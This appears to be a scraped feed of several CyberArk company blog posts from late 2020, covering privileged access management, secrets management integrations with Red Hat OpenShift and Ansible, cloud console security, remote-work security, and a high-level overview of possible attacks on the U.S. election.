Many development platforms and tools have their own native, or built-in, security components that manage credentials and access, and may even offer some form of audit support. Yet typically these security mechanisms don’t securely share secrets with other tools, instead creating isolated “islands of security” that make it difficult to consistently manage privileged credentials across the organization. To eliminate these disparate security islands and mitigate the risk of data breaches, all privileged credentials should be centrally managed, rotated, monitored and audited across the enterprise’s entire development and operations environment.

CyberArk Secrets Management solution is designed to do just that. It provides a comprehensive, centralized solution for securing credentials and secrets for applications, containers and CI/CD tools across native cloud and DevOps environments. CyberArk Conjur, our open source secrets management tool, complements this enterprise offering.

Simplify Securing OpenShift Containers with Out-of-the-Box Integrations

Through several powerful integrations, CyberArk and Red Hat provide ways to simplify and strengthen container security by safeguarding the credentials used by applications running in OpenShift containers.

CyberArk Application Access Manager integrations with Red Hat OpenShift offer major benefits for cross-functional teams, including:

  • Development: Simplifies how developers write code to use credentials to securely access databases and other sensitive resources with flexible APIs. Code running in OpenShift containers can seamlessly access – and use – the required credentials, which are centrally managed and secured by CyberArk.
  • Operations: Automatically secures and rotates secrets used by OpenShift containers based on the organization’s policies managed by the CyberArk platform. This eliminates the need for operations to manually change, populate and provide audit trails for credentials used by containers.
  • Security: Separates the duties so that each container-based application only has access to the credentials or secrets needed to access the specific resources they are authorized to access. Policy-based access controls are set by the organization’s security team and managed by the CyberArk platform.

Together, CyberArk and Red Hat can help eliminate security islands and siloed credentials, enabling developers and operations teams to more easily and securely deploy applications at scale.

Secretless Broker Further Improves Container Security and Simplifies How Developers Write Code

CyberArk Application Access Manager provides OpenShift developers with flexible APIs including environmental variables and Rest APIs. Each supported method is designed to secure secrets to databases and other sensitive resources, helping developers stay focused developing code and moving fast.

Developers looking for an alternative to APIs can take advantage of Secretless Broker, a feature within CyberArk Application Access Manager and CyberArk Conjur. With Secretless Broker, applications can securely connect to databases, services and other protected resources – without ever accessing or even knowing the credential.

When an application needs to securely access a resource, it simply makes a local connection request to Secretless Broker. Secretless Broker then automatically authenticates the app using the native characteristics of the OpenShift container and establishes a connection to the database or other resource. This approach reduces the attack surface by preventing credentials from being exposed to applications. After all, applications cannot leak credentials that they don’t have access to. This also provides a simpler way for developers to write code to securely access databases.

3 Ways to Get Started with CyberArk and OpenShift: Webinar, Workshop and Resource Library

Join Red Hat and CyberArk for a live webinar, “Modernize DevOps with CyberArk Secrets Management and Red Hat OpenShift,” on Tuesday, November 10, 2020 at 1:00 pm EST. Attendees will explore lessons learned from recent breaches involving DevOps environments and the implications for containerized apps, key benefits of enhancing platform-specific secrets management capabilities with a centralized approach, and practical steps to take that strengthen container security without impacting developer velocity.

Register here to reserve your spot. For a deeper dive, webinar attendees can join an interactive, hands-on technical workshop hosted by Red Hat and CyberArk on December 10, 2020. For details, reach out to sales@cyberark.com or your CyberArk contact.

To learn more about securing your OpenShift environments with CyberArk and Red Hat, along with the CyberArk Secretless Broker feature, check out these resources:

]]>
Five Attack Scenarios That Could Alter the U.S. Election https://www.cyberark.com/blog/five-attack-scenarios-that-could-alter-the-u-s-election/ Thu, 22 Oct 2020 14:37:20 +0000 https://www.cyberark.com/?p=103981 On October 21, the FBI held a press conference alerting U.S. citizens about new details concerning nation-state interference with the upcoming U.S. elections. According to news reports, attackers have gained access to stolen voter registration data and are using it to confuse and even potentially intimidate voters. Director of National Intelligence, John Ratcliffe said, “This data can be used by foreign actors to attempt to communicate false information to registered voters that they hope will cause confusion, sow chaos, and undermine your confidence in American democracy.” These are serious charges.

If we learned anything from 2016, it’s that nation-states, criminal organizations, and other malicious actors view infiltrating and disrupting elections as a brass ring and are continually looking for ways to make their mark. The recent U.S. indictment of one nation-state group shows the disruption these groups can cause.

The cyber attacks of the last presidential election primarily manifested in the form of disinformation campaigns. But as we’re already seeing, in 2020, the goal of disruption and chaos will play out with greater intensity — and it will last well after Nov. 3. In addition, the continued lack of consistent regulations guiding voting and security across States, counties, towns, and even local polling precincts is exacerbating this issue.

The CyberArk Labs team has been closely monitoring the events leading up to the U.S. election. Based on analysis of ongoing attack techniques and the inherent vulnerabilities in government and voting infrastructure, here are five ways we think attackers could seek to disrupt this year’s election, both directly and indirectly.

1. Social Engineering on the Rise

According to the Verizon Data Breach Investigations Report, social engineering attacks are increasing year-over-year and more than 80% of all data breaches tied to hacking involve the theft and use of stolen credentials.

Attackers use social engineering attacks to target individuals in hopes of stealing their credentialed access to systems and data. The recent Twitter breach was a prime example of this: attackers targeted a small set of employees with a coordinated social engineering campaign which resulted in stolen credentials being used to gain unauthorized access to an administrative tool that led to the compromise of high-profile accounts. This included the democratic presidential nominee, Joe Biden.

While attackers will certainly be looking to infiltrate those close to each party, the threat goes much farther than a campaign team or the nominee themselves. State and local governments that are charged with holding and protecting elections will also be attractive targets. It only takes one compromised account for an attacker to potentially breach an organization’s entire infrastructure.

2. Targeting Volunteers and Campaign Staff to Become Privileged Insiders

Identity-centric attacks will most likely be used on election volunteers, including polling staff.  While campaign staff are always targets, you don’t need to breach a John Podesta to damage a campaign. Every staffer, every volunteer and every contractor connected to the campaign has the potential to become a privileged insider based on the data or applications they have access to.

Attackers know this and will look to exploit this privileged status – targeting these individuals with social engineering attacks to steal their insider access. With this level of access, attackers can exfiltrate ‘compromising’ material and information, use their status to disseminate disinformation across trusted channels like social media and email, or even lock down campaign operations through targeted malware and ransomware attacks.

The same concept applies to the more than estimated 460,000 poll worker volunteers expected at precincts across the country this year. While volunteers do not necessarily have access to election infrastructure itself, they are likely provided access to the networks at polling places for their phones, laptops, and other devices. Targeting a volunteer’s personal device could provide an easy backdoor for attackers to infiltrate the network, elevate privileges and move laterally into a network to launch ransomware or similar attack on a polling precinct. This massive drive for poll volunteers is also ripe for a bevy of online scams and fraud activity. Anyone signing up for volunteer status should only do so through reputable sources.

3. Targeted Attacks on Critical Infrastructure to Cause Chaos Pre- and Post- Election

Atlanta. Baltimore. New Orleans. Three U.S. cities that had civic operations ground to a halt in the last year due to massive ransomware attacks. A coordinated attack of this nature timed for election day could cause widespread chaos – from shutting down public transportation and making it harder for voters to get to the polls, to crashing phone systems to prevent voters from asking questions or volunteers from reporting results. Targeted attacks of this nature, focused on battleground states, might suppress critical votes that could change the very outcome of the election.

Post-election scenarios are grim as well. Targeted attacks on state and local agencies overseeing the election may postpone result totals from being reported, or worse, from being trusted. Given the contentious nature of this year’s election, attacks on critical infrastructure like the energy grid or water treatment facilities could amplify social unrest and further cause chaos during the transition period.

4. U.S. Election Databases

The myriad problems with election infrastructure are well known. Last year, it was discovered that attackers were able to breach election databases in two counties in Florida in 2016. The attackers used the typical phishing approach to trick unsuspecting workers, stealing access to the networks.

Voter registration databases that collect state-wide voter records present a good opportunity for attackers to target. Typically connected to networks to facilitate record sharing, attackers might look to infiltrate these databases to manipulate the data that they hold. By doing so, threat actors could perform simple functions like changing registration information in targeted districts to make it more difficult for people to vote.

And while absentee, mail-in ballots are broadly considered secure, the push to allow for broader mail-in voting opens up new possibilities for malfeasance. The actions of changing voter information may alter where eligible ballots are delivered, delay delivery, or otherwise impinge the process.

5. New Types of Disinformation Campaigns Emerge

The social media-based disinformation campaigns of 2016 were well documented and are expected to continue to amplify as we get closer to the vote in 2020. These tactics could be amplified by targeting trusted sources – like prominent politicians or news personalities, the candidates themselves or their staff, or even local politicians and elected officials to push propaganda.

As we saw with the Twitter hack and subsequent crypto-scam earlier this year, no channel is safe. Identity-centric attacks designed to steal access to social media profiles could be weaponized to spread disinformation at the most inopportune time. While candidate disinformation may be more easily dismissed, attackers could subvert these trusted platforms to push misinformation like polling locations, polling times, and election results before polls close impacting voters everywhere.

Combine these attacks with the growing use of deep fakes – which are manufactured media in which existing images or videos are maliciously edited – and the opportunities for disinformation have never been greater.

We should expect attackers to continue to target government agencies and websites as an avenue to push misinformation. Organizations like the CDC could be targeted to promote COVID-19 related disinformation on or before election day. Attackers, for example, could potentially suppress in-person voting by releasing false information on COVID outbreaks in targeted counties or push public opinion in direction of one campaign or another by promoting false vaccines, outbreaks, or more.

Disinformation attacks could also provide false voting information for both mail-in and in-person ballots, release fake election results early to inhibit continued voting and more.

Protecting U.S. Elections Starts with Securing Privileged Access

Many of the attacks mentioned above have been battle-tested by threat actors in the private sector. What we’ve learned from studying these attacks is that obtaining and exploiting privileged credentials is a top priority for attackers. Privileged access gives attackers the ability to reach critical systems, spread ransomware, exfiltrate sensitive information, compromise social channels, and more.

Securing the U.S. elections in 2020 and beyond requires a comprehensive approach that enforces Identity Security with a strong foundation in privileged access management. This can harden defenses against a fluid attack landscape, protect against evolving vulnerabilities, and minimize the ability for attackers to exploit the people associated with the campaigns.

To stay up to date on emerging attack techniques and research, visit the CyberArk Threat Research blog.

]]>
5 Best Practices for Securing Privileged Access and Identities for the Cloud Management Console https://www.cyberark.com/blog/5-best-practices-for-securing-privileged-access-and-identities-in-the-cloud-management-console/ Tue, 20 Oct 2020 15:53:40 +0000 https://www.cyberark.com/?p=103884 Over the next few weeks, we’ll explore best practices for securing privileged access and identities in common cloud scenarios. This series can help guide effective risk reduction strategies for today and for the future as cloud workloads evolve.

First up, we’re looking at cloud management consoles, which are used by admins to set up the entire cloud environment, oversee all types of cloud activities (i.e. use tracking, data integration, resource deployment, and more) and configure operational and security settings. Before we dive in, here’s a look at the current state of the cloud.

How Are Enterprises Adopting Cloud?

While achieving a fully cloud-based IT infrastructure may be an ultimate digital transformation goal for some organizations, the vast majority are taking a hybrid approach today. According to a recent industry study, 93% of enterprises have a multi-cloud strategy in place. Meanwhile, as the world adapts to new realities, software-as-a-service (SaaS) use continues to skyrocket, enabling companies to conduct critical business and empower remote workforces.

There’s no denying the business benefits of deploying cloud infrastructure and running enterprise applications in the cloud – enhanced flexibility, simplified operations, cost savings and scalability are just a few. Yet every cloud deployment scenario creates new risk. This is particularly true in the wake of COVID-19. As leaders accelerate their cloud journeys to digitize quickly, attackers are targeting critical data and assets in the cloud in earnest. Within the first few months 2020 alone, cyber attacks targeting the cloud grew by a staggering 630%.

Now more than ever, it’s important for organizations to fully understand their role in securing cloud workloads as part of the shared responsibility model. While cloud providers are responsible for the cloud infrastructure itself, cloud customers must secure their data, applications, operating systems, supporting infrastructure and other assets running in the cloud environment.

Privileged accounts associated with human users and application and machine identities are exceptionally powerful and highly susceptible to compromise in the cloud. Protecting privileged access in these environments is paramount and the onus lies on the cloud customer. In fact, more than half of the top cloud computing threats today can be mitigated with strong privileged access management (PAM) and identity access management (IAM) controls.

5 Best Practices for Securing Privileged Access in Cloud Management Consoles

Since cloud management consoles and portals enable full control of an organization’s cloud resources, they are prime targets for cyber attackers, and all access to them must be secured and monitored. This is particularly true for powerful root-level accounts – the accounts with irrevocable administrative privileges such as the AWS root user account, Azure global admin role, and the Google Cloud Platform (GCP) super user account.

1. Treat all cloud management console access (for both human and machine users) as privileged. First, identify what permissions a user or application/machine needs to do their specified job. Build roles for each user persona, giving them access to only what they need by following the principle of least privilege. Enforce privileged access management controls including session isolation, monitoring, and credential rotation to reduce risk.

2. Implement just-in-time access to reduce the attack surface. By providing just-in-time access to the cloud management console, versus standing access, permissions are provided when the session is launched – helping to ensure that only the right users have access to the right assets at the right time, and only for a certain amount of time.

3. Secure all human access to the cloud console using single sign-on (SSO) and multi-factor authentication (MFA). Whether access to the cloud console is standing or temporary, human access should be protected by SSO and MFA. SSO makes it easier for users to access their work applications in one place without having to remember multiple passwords. Additionally, SSO via SAML to the cloud console enables federated users to assume roles within the cloud provider. A role is an IAM identity that has specific permissions and can be assumed by anyone who needs it – it is not associated with a specific user and does not have long-term credentials. The intent of a role is to provide temporary access to the console for that specific session only. In parallel, MFA confirms that users are who they say they are by requiring them to pass multiple authentication challenges.

4. Secure API and automated access to the cloud management console. Cloud management consoles and portals can be accessed by automated scripts via API access keys. These API keys are highly privileged and very powerful – for example, they can enable a script or user to stop or start a virtual server, copy a database or even wipe out entire workloads. To protect your cloud workloads, securing API keys and applying least privilege is imperative.

5. Consistently apply access policies to administrators across multi-cloud, on-premises, and hybrid environments. One compromised admin is all it takes to delete your whole cloud environment configuration. Strong privileged access oversight is necessary for security and audit purposes. Record admin activity and monitor active sessions, assigning session risk scores based on pre-defined risky behavior and activity, such as accessing the console during off-hours or from irregular locations. This enables organizations to identify misuse fast and terminate sessions when a potential attack is suspected.

Attackers can find and abuse permissions to escalate privileges and become full cloud admins. What’s more, they can easily use these permissions to hide stealthy shadow entities that remain hidden and can be used as backdoors to the cloud environment. Scan your environment to discover privileged entities (users, groups, and roles) and expose stealthy cloud shadow admins.

A Secure Cloud Is Your Business Advantage

Today, you may be extending cloud initiatives with DevOps pipelines to increase business agility. Or maybe you’re looking at on-demand compute and storage to drive cost savings. No matter where you are on your cloud journey, privileged access and identity policies must be enforced consistently across your organization to reduce exposure and protect your critical assets. Get practical guidance in our eBook, “Securing Privileged Access and Identities In 4 Key Cloud Scenarios,” and visit cyberark.com/cloud. Be sure to check back soon to explore part two of our series on securing your organization’s dynamic cloud infrastructure.

]]>
Don’t Stop Risk Distancing. Remote Work Is Here to Stay https://www.cyberark.com/blog/dont-stop-risk-distancing-remote-work-is-here-to-stay/ Wed, 14 Oct 2020 14:22:22 +0000 https://www.cyberark.com/?p=103713 A Look Back: The Sprint to Remote Work Created Security Gaps

The global shift to remote work happened fast: millions of employees went home last March and adjusted to new ways of working – thanks to the IT teams and cybersecurity leaders working tirelessly behind the scenes to make it happen.

The risk landscape changed dramatically during this period of transition. Global VPN usage skyrocketed, while 66% of remote employees adopted new communication and collaboration tools and 77% started using personal devices to access corporate systems. Existing security policies were relaxed or abandoned altogether in the name of business continuity, and it wasn’t long before risky work-from-home shortcuts, such as sharing corporate devices with family members, became hard-to-break habits that put organizations in danger of identity-related breaches.

Opportunistic attackers massively scaled their attacks but continued using tried-and-true methods like phishing, social engineering and brute force to steal credentials and use them to gain illegitimate privileged access to sensitive assets. A recent Identity Defined Security Alliance (IDSA) study reveals that nearly 80% of organizations have experienced an identity-related breach in the past two years (and 19% have since the pandemic crisis started). Employees were targeted in 75% of those breaches.

Where We Are Today: Identity Security Is a Work in Progress

Today, most employees are still working from home. While social distancing mandates have eased in some geographies, it’s becoming increasingly clear that the way we work has changed for good. According to a recent PwC study, 83% of office workers expressed interest in working remotely at least one day a week, while more than half of executives (55%) plan to extend work-from-home options for the long term.

To keep users, workstations and critical assets secure in this new reality, security programs and policies must evolve. Yet for many organizations, there is much work to be done. Our remote work study found 40% of organizations have not yet increased security protocols despite significant changes to remote access needs and cloud application use. According to the IDSA study, less than 50% of organizations have fully implemented any of the following strategies:

  • Requiring multi-factor authentication (MFA) for all privileged access
  • Granting privileged access according to the principle of least privilege (meaning each user has only the minimum level of access needed to do their job)
  • Revoking access upon detection of a high-risk event associated with that identity
  • Continuously discovering all privileged access rights and user access rights
  • Transparently auditing and enforcing application access
  • Using device characteristics and expected user behavior for authentication 

Where to Go from Here: Practice Risk Distancing to Secure the Remote Workforce

By following these five best practices for risk distancing, you can master the basics, align security controls with the evolving risk landscape, and strategically mature your program to mitigate the risk of identity-based attacks:

Secure Remote Access for all Users. Both remote employees and third-party vendors need access to enterprise resources to do their jobs. Yet traditional approaches like using VPNs can frustrate users, add risk with overly broad network access and create administrative and helpdesk headaches. As organizations settle into the remote work reality, many are seeking to provide convenient, secure remote access to enterprise applications without VPNs. They’re also looking for ways to secure third-party remote vendor access to critical systems using Zero Trust approaches and just-in-time provisioning.

It is important to note – if you do still use a VPN, it’s critical to secure VPN access with MFA to reduce risk.

Strengthen Workstations with MFA. Multi-Factor Authentication (MFA) protects user devices, logins, applications, and even VPN connections with stronger authentication than passwords alone. User-friendly authentication methods like push notifications, Windows Hello, Apple Touch ID, YubiKeys or mobile authenticator apps help keep employees productive and home-based work environments safe. Since many employees admit to reusing passwords between the work and personal world, passwordless authentication (i.e. biometrics that use built-in smartphone capabilities to confirm identities) is fast becoming a top security priority and should be considered.

Lock Down Privilege on the Endpoint. In the wrong hands, local administrative rights can be used to establish a foothold leading to further compromise such as ransomware, privilege escalation attacks, and lateral movement. Fundamental user control begins with removing these admin rights from employee workstations. To do this, first identify where local admin rights exist across your distributed workforce. Then, remove local admin rights and institute just-in-time provisioning to effectively implement least privilege and keep users productive.

Don’t stop there. Since 37% of remote workers admit to insecurely saving passwords in browsers on corporate devices, credential theft blocking capabilities are key. Additionally, strong application control enables users to work with their preferred tools and workflows while restricting or blocking risky applications.

Manage Access to Applications With SSO. Adaptive single sign-on (SSO) enables a secure and frictionless sign-in experience for both internal and external users that adjusts automatically based on risk. By managing access to applications using SSO capabilities, you can improve security through reduced use of passwords, increased productivity with simplified access to employee resources, and enhanced IT ability to meet compliance requirements.

Educate Employees. A staggering 99% of IDSA survey respondents who have experienced an identity-related breach in the past two years believe these breaches were preventable. The majority (71%) said better security awareness training could have helped them avoid an attack. Ongoing education on common cyber threats, information handling guidelines, and security best practices for remote work – such as using strong passwords, encrypting home Wi-Fi networks, and only using company-sanctioned collaboration tools – will go a long way. Plus, regular Red Team exercises can help test defenses and inform education programs to drive continuous improvement.

The rise in remote work has created new challenges, but it also presents new opportunities for employers and employees alike. To succeed in this new normal, Jason Fried, author of “Remote: Office Not Required,” encourages organizations to “focus on reaping the great benefits and mitigating the drawbacks.”

To learn how CyberArk solutions can help you protect your critical assets and workstations while empowering users wherever they work, visit our Risk Distancing Resource Center and join our webinar, “Four Key Recommendations for Securing Remote Work” on Wednesday, October 21, 2020 at 9:00 a.m. EDT.

]]>
Securely Automate IT Tasks with Ansible and CyberArk https://www.cyberark.com/blog/securely-automate-it-tasks-with-ansible-and-cyberark/ Thu, 08 Oct 2020 15:35:27 +0000 https://www.cyberark.com/?p=103455 Over the past few years, IT teams have embraced IT automation as a powerful tool to eliminate repetitive tasks, improve efficiency and consistency, and boost productivity and collaboration. The business realities of 2020 are propelling a new wave of automation as many organizations focus on building resilience and scaling digital transformation efforts, while keeping costs down.

Red Hat’s Ansible is one of the leading IT automation platforms and is widely used by organizations to automate a broad range of IT functions including application deployment, configuration management and continuous delivery. Time-consuming tasks and problems can be tackled efficiently by writing one script, then scaling across the organization using policy and governance to track and monitor changes. With Ansible, which is available in both enterprise and open source versions, organizations can drive complexity out of their environments and accelerate IT initiatives.

Ansible Playbooks Execute IT Automation Functions

Playbooks are the files in which Ansible’s automation code is written. They contain the instructions that execute the various configuration, deployment and orchestration functions to simplify processes. For example, playbooks can describe a policy for remote systems to enforce, or a set of steps in a general IT process such as managing configuration and deployment to remote machines. Playbooks can be relatively simple – orchestrating a short, ordered list of tasks – or more advanced; for example, sequencing multi-tier rollouts with rolling updates, delegating actions to other hosts, as well as interacting with monitoring systems. Designed for ease-of-use, playbooks use a basic text language and are relatively easy to understand, write and use.

Ansible Playbooks are highly privileged. To access, manage and configure IT resources – such as a VM, server or cloud compute instance – playbooks require appropriate credentials and secrets. If these powerful privileged credentials are not properly managed and secured – or left hardcoded in playbooks or scripts – they become attractive targets for attackers. Using compromised credentials, attackers can access sensitive IT resources and services. Learn more about how automation can expand the privileged attack surface here.

Simplify Ansible Playbooks with Native Out-of-the-Box Integrations

CyberArk and Red Hat provide several native integrations to enhance Ansible security and protect automation environments. These integrations empower DevOps and security teams to automatically secure and manage the credentials and secrets used by IT resources and CI/CD tools.

CyberArk Application Access Manager integrations with Red Hat offer major benefits for both operations and security, including:

  • Dramatically simplifying how operations teams write and use playbooks to securely access the credentials they need to do their job – automating IT functions. Playbooks can seamlessly access, then use, these credentials, which are centrally managed and secured by the CyberArk Core Privileged Access Security solution. For example, when using Ansible, simply use a drop-down menu to select CyberArk as the secrets vault.
  • Secrets used by Ansible Playbooks are automatically secured and rotated by CyberArk based on the organization’s policy. This eliminates the need for operations to manually change and even populate credentials used by the playbooks.

Another important security benefit, and a common question from security teams, is how can security help ensure that each of the various teams across the enterprise writing playbooks only have access to the secrets they need to automate their specific IT tasks? For example, Team A’s playbooks should only have access to the specific secrets and credentials they are allowed, while Team B should only have access to theirs. The CyberArk Red Hat integration solves this separation of duties issue by extending CyberArk’s application and machine identity functions into Ansible Tower’s role-based access controls (RBAC).

Visit CyberArk at AnsibleFest 2020 – Without Leaving Your Workspace

Automation is a strategic component of modernization and digital transformation. To explore how your organization can benefit, attend AnsibleFest – a free, virtual experience on October 13-14, 2020.

See a powerful CyberArk Red Hat integration in action in the session “Defending a Defense Company with Ansible Automation Platform” on Tuesday, October 13 at 10:00 a.m. EDT. Explore a leading defense firm’s automation journey using Ansible to securely configure its global network. You’ll learn how the company’s Ansible team was able to rapidly develop playbooks to use privileged credentials managed by CyberArk to automate the configuration process and quickly rotate device passwords based on policy or an incident – driving significant business advantage.

During AnsibleFest, be sure to drop by CyberArk’s virtual booth and talk with our technical team.

If you’d like to learn more about securing your Ansible automation environments with CyberArk and Red Hat, including CyberArk’s secrets management solutions, check out these resources:

 

]]>
Simplified UX for Improved Platform Management: A Win-Win for Expanding Your PAM Program https://www.cyberark.com/blog/simplified-ux-for-improved-platform-management-a-win-win-for-expanding-your-pam-program/ Tue, 06 Oct 2020 12:30:16 +0000 https://www.cyberark.com/?p=103441 Rule No. 1 of Google’s “10 Things” philosophy is simple: Focus on the user and all else will follow. It’s solid advice, whether you’re in the business of online search, eCommerce, healthcare or enterprise security software. Studies show that by positioning users at the core of product development, companies can simplify customer acquisition and increase retention, lower support costs and, most important, amplify product value for their customers. User experience (UX) is key to development and adoption of an effective privileged access management program and is particularly important for PAM administrators.

In the age of digital transformation, PAM administration is not a one-and-done task. Security teams must work to implement and maintain consistent controls throughout evolving IT infrastructure. A central challenge for PAM administrators is keeping pace with the business as it adds new technology on-premises, in the cloud and throughout the DevOps pipeline. To effectively manage privileged credentials and identities, empower IT admins to securely administer rapidly changing infrastructure and protect the organization’s most critical systems and data, administrators need centralized visibility and control.

This brief demo video highlights CyberArk’s platform management view, a simplified interface for PAM administrators to centrally manage security policies for each type of IT system within their organization.

In this example, we’re securing credentials and sessions for Facebook admins:

 

While they are not shown in this demonstration, CyberArk does offer a wide range of REST APIs for managing platforms to streamline administrator’s daily workflows via automation. Find all REST APIs in our documentation.

The platform management view feature, which also accelerates adoption of key privileged access management controls, is available in the CyberArk Privileged Access Management Solution and CyberArk Privilege Cloud, our PAM as a Service offering.

From the platform management view, administrators can not only manage existing infrastructure but also rapidly add CyberArk Marketplace plugins that securely manage credentials and isolate and monitor privileged sessions to a given platform. CyberArk customers can download over 300 certified technology integrations for credential and session management, allowing them to rapidly secure access to web and SaaS applications, security appliances, smart devices in the Internet of Things (IoT) and more.

The ability to simplify administration with the platform management view has several benefits for any PAM program. First, centralized visibility and control improves the operational efficiency of key tasks for PAM administration. This, in turn, reduces risk by enabling PAM programs to enforce consistent controls across the enterprise. Risk is further mitigated through facilitated adoption of privileged session management, a critical element of any strong PAM program.

Simple PAM administration. Simple PAM adoption. That’s a win-win.

Interested in exploring more PAM UX features and best practices? Check out our guide for jump-starting your program with PAM as a Service.

]]>
Video Test https://www.cyberark.com/blog/video-test/ Fri, 02 Oct 2020 19:14:38 +0000 https://www.cyberark.com/?p=103436

]]>
October is National Cybersecurity Awareness Month: Do Your Part. Meet Pam and #BeCyberSmart https://www.cyberark.com/blog/october-is-national-cybersecurity-awareness-month-do-your-part-meet-pam-and-becybersmart/ Thu, 01 Oct 2020 14:50:43 +0000 https://www.cyberark.com/?p=103361 October is National Cybersecurity Awareness Month (#NCSAM). Now in its 17th year, the month-long event promotes cybersecurity best practices and resources to help citizens stay safe and secure online.

This year’s theme, “Do Your Part. #BeCyberSmart,” reminds us that cybersecurity is a shared responsibility and we each have a role to play. Everyone should visit the Cybersecurity and Infrastructure Security Agency site to brush up on tips for securing their digital profile – from picking strong passwords and safeguarding connected devices with multi-factor authentication (MFA), to securing home networks and keeping software up to date.

Businesses must also do their part to make the digital world a safer place for customers, employees and partners. This begins with protecting access to their critical enterprise assets.

Most targeted cyber attacks today follow a similar pattern. Attackers find privileged credentials – those that provide elevated access and permissions – and use them to gain access to an organization’s most valuable systems and information. That’s why it’s so important to manage and secure these powerful privileges for human, application and machine users with privileged access management.

Like many technology terms, privileged access management doesn’t exactly role off the tongue, so it has an acronym to make things easy: “PAM.” This inspired a special addition to the CyberArk family to help us promote National Cybersecurity Awareness Month.

We’re proud to introduce “Pam,” our cybersecurity heroine and fearless purveyor of privileged access management who fights the good fight and helps you stay one step ahead of attackers. Throughout the month, you’ll see Pam pop up on our social media channels, providing tips and practical advice. Be sure to follow us on Twitter, LinkedIn and Facebook so you don’t miss a beat.

Meet Pam Our Cybersecurity Heroine

To start, here’s a look at two reasons why your organization should join forces with Pam this National Cybersecurity Awareness Month.

Pam is All About Maximum Security

In modern organizations, privilege is everywhere – in the cloud, on endpoint devices, in applications, within automated processes, and throughout the DevOps pipeline. As digital transformation initiatives accelerate and more workloads and applications move the cloud, the number of privileged credentials continues to grow exponentially.

Obtaining privileged credentials is a top priority for malicious insiders and external attackers, as it provides the access needed to reach critical systems and accomplish evil missions, from disrupting business, to stealing digital currency, valuable intellectual property or sensitive customer data.

That’s where Pam comes in. She saves the day by securing the privileged pathways most traveled in attacks. She’s street-wise, savvy and knows it doesn’t take advanced techniques for attackers to establish a foothold – especially in the era of remote work where employee endpoints are plentiful targets.

For her, endpoint security is only part of the solution. She understands effective cybersecurity requires multiple layers of defense to defeat adversaries. Nefarious characters will find a way in, but when they do, she’ll be ready with a host of superpowers up her sleeve to stop attacks before they stop business.

Pam Never Backs Down From a Challenge. She Can Help You With Yours

Along with her many superpowers, Pam gives expert advice on everything from technology choices to process enhancements and effective organizational change management strategies.

She helps organizations get started with privileged access management by identifying exactly where their biggest risks exist, then helps business leaders know where to focus their efforts, how to measure progress and drive accountability.

She’ll tell you that an incredible PAM strategy makes it simple for everyone to do the right thing. By implementing automated, centralized and proactive controls, organizations can stop cyber criminals in their tracks.

Do your part by prioritizing privileged access management. Whether you’re just getting started or maturing your program, Pam is the defender your organization needs right now. Follow CyberArk on social and get ready to meet the next cybersecurity superhero.

]]>
Enable New Ways of Work: Simplified Remote User Privileged Access with SaaS https://www.cyberark.com/blog/enable-new-ways-of-work-simplified-remote-user-privileged-access-with-saas/ Wed, 30 Sep 2020 12:15:50 +0000 https://www.cyberark.com/?p=103225 Organizations everywhere are undertaking major digital transformation initiatives. Whether moving critical resources to the cloud, or investing in greater automation capabilities, COVID-19 has dramatically accelerated these efforts to quickly enable remote work and keep businesses up and running. As this occurs, IT landscapes are growing in scale and complexity, resulting in a proliferation of privileged accounts. Related privileged credentials exist everywhere in these environments – including in tools and applications – and must be properly and consistently managed.

This sudden sprint to remote work also accelerated a shift to SaaS-based solutions that allow organizations to offload a good deal of the on-premises infrastructure and outsource ongoing maintenance and administrative work so that teams can focus more on security. This is particularly true for privileged access management (PAM) where many organizations have turned to Software as a Service (SaaS).

COVID-19 has dramatically accelerated digital transformation

Source: Marketoonist.com

Implementing SaaS solutions to enable remote work is critical, but ensuring those solutions are also secure is just as important. This is particularly true for third-party vendors or contractors, who are often not a part of the company directory and require ephemeral access to sensitive systems on a day-to-day basis. For these users, as well as the remote workforce at large, many organizations have increased their reliance on VPNs, which have been linked to many high-profile breaches. In addition to the security risks, VPNs are also very difficult to set up and use for privileged access, as they do not provide the granular levels of remote access required for remote users who are at greater risk for misuse or attack if not properly secured.

A Powerful Integration That’s Quick to Deploy and Easy to Use

With a balanced security approach that brings the full benefits of SaaS, today CyberArk launched the first solution that combines all of the necessary elements for securing third-party vendor access to critical systems, without additional on-premises infrastructure. The powerful integration of CyberArk Privilege Cloud and CyberArk Remote Access provides the remote workforce with a strong mix of centralized privileged access controls, Zero Trust access, biometric multi-factor authentication (MFA) and just-in-time provisioning for third party vendors. Customers can now deploy a full SaaS-based privileged access management solution that secures remote user (employees, third-party vendors and contractors) access to critical systems managed by CyberArk. Customers can quickly secure and enable their remote workforce.

Here is how it all works.

First, as a remote user attempts to access the CyberArk web portal, they will get redirected to the Vendor Privileged Access Manager web interface. Vendor Privileged Access Manager then prompts the MFA: biometric authentication of a retina or fingerprint scan for smartphone users or a text and email combination, or voice calls for non-smartphone users. The user then completes the authentication and is redirected to the web portal where they can access the various systems they are provisioned to access.

All sessions that are initiated are routed through the privileged session management gateway to the Privilege Cloud Connector so that they are automatically isolated, recorded, and monitored. Further, the sessions are encrypted via an HTTPS tunnel between the Privilege Cloud Connector and the back end, hosted by CyberArk. The desired connection pings the vault to pull a credential but is never sent directly to the remote employee or vendor’s workstation.

Enable Remote Work Diagram

As shown above, CyberArk hosts the entire Vendor Privileged Access Manager and Privilege Cloud service in the cloud as a seamless workflow to enable remote employees and third-party vendors. The only self-hosted component of the solution for customers is the Privilege Cloud Connector, which is automatically hardened by CyberArk. CyberArk also hardens the underlying OS, helping organizations save additional time and increase confidence in the overall security of the back end.

Extending use cases is easy. Organizations can choose to rotate passwords, protect and audit cloud console administrators, manage service accounts, record and audit sessions, and secure access for users like third-party vendors and contractors, and more. Managing privileged access under one roof with one single, integrated SaaS solution provides the best of both worlds for security and operations. As remote work becomes even more deeply entrenched into how businesses operate, having a unified, end-to-end solution for securing the entire remote workforce has never been more important.

For those who would like to try CyberArk Remote Access for securing remote vendor access to CyberArk, we are now offering a 30-day free trial. Learn more about CyberArk’s leading PAM as a Service solution.

]]>
Why Desktop MFA is Essential to Your Endpoint Security https://www.cyberark.com/blog/why-desktop-mfa-is-essential-to-your-endpoint-security/ Tue, 29 Sep 2020 13:00:45 +0000 https://www.cyberark.com/?p=99350 An employee’s work laptop can be a treasure trove for any malicious actor who can get access to it.

